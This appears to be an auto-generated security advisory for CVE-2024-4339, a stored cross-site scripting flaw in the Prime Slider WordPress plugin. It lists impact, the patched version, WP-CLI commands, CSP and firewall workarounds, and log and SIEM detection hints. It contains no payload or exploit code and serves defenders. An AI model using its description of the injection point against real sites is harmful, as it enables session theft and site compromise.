CVE-2024-4339
📋 TL;DR
This vulnerability allows authenticated WordPress users with contributor-level access or higher to inject malicious scripts into pages using the Prime Slider plugin's General widget. The scripts are stored and execute whenever users view the compromised pages, enabling session hijacking, defacement, or malware distribution. All WordPress sites using vulnerable versions of the Prime Slider plugin are affected.
💻 Affected Systems
- Prime Slider – Addons For Elementor (WordPress plugin)
📦 What is this software?
Prime Slider by Bdthemes
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator credentials, redirect users to malicious sites, install backdoors, or completely compromise the WordPress site and potentially the underlying server.
Likely Case
Site defacement, cookie/session theft leading to account takeover, or injection of cryptocurrency miners/adware into visitor browsers.
If Mitigated
With proper user role management limiting contributors and strong CSP headers, impact is reduced to potential defacement only.
🎯 Exploit Status
Exploitation requires contributor-level WordPress access but is technically simple once authenticated.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.14.4 or later
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find 'Prime Slider – Addons For Elementor'. 4. Click 'Update Now' if available, or manually update to version 3.14.4+. 5. Clear any caching plugins/CDN caches.
🔧 Temporary Workarounds
Disable Prime Slider Plugin
allTemporarily deactivate the vulnerable plugin until patched.
wp plugin deactivate bdthemes-prime-slider-lite
Restrict User Roles
allRemove contributor access or implement strict role-based access control.
🧯 If You Can't Patch
- Implement Content Security Policy (CSP) headers to restrict script execution sources.
- Install a Web Application Firewall (WAF) with XSS protection rules.
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins for Prime Slider version. If version is 3.14.3 or lower, you are vulnerable.Check Version:
wp plugin get bdthemes-prime-slider-lite --field=versionVerify Fix Applied:
Confirm Prime Slider plugin version is 3.14.4 or higher in WordPress admin panel.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to wp-admin/admin-ajax.php with Prime Slider parameters
- Suspicious content in wp_posts table containing script tags
Network Indicators:
- Unexpected JavaScript loading from your domain in browser developer tools
SIEM Query:
source="wordpress.log" AND "prime-slider" AND ("POST" OR "script" OR "alert")🔗 References
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3080132%40bdthemes-prime-slider-lite%2Ftrunk&old=3079066%40bdthemes-prime-slider-lite%2Ftrunk&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/6eba6056-e087-4347-ad36-96501ceb4cdd?source=cve
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3080132%40bdthemes-prime-slider-lite%2Ftrunk&old=3079066%40bdthemes-prime-slider-lite%2Ftrunk&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/6eba6056-e087-4347-ad36-96501ceb4cdd?source=cve
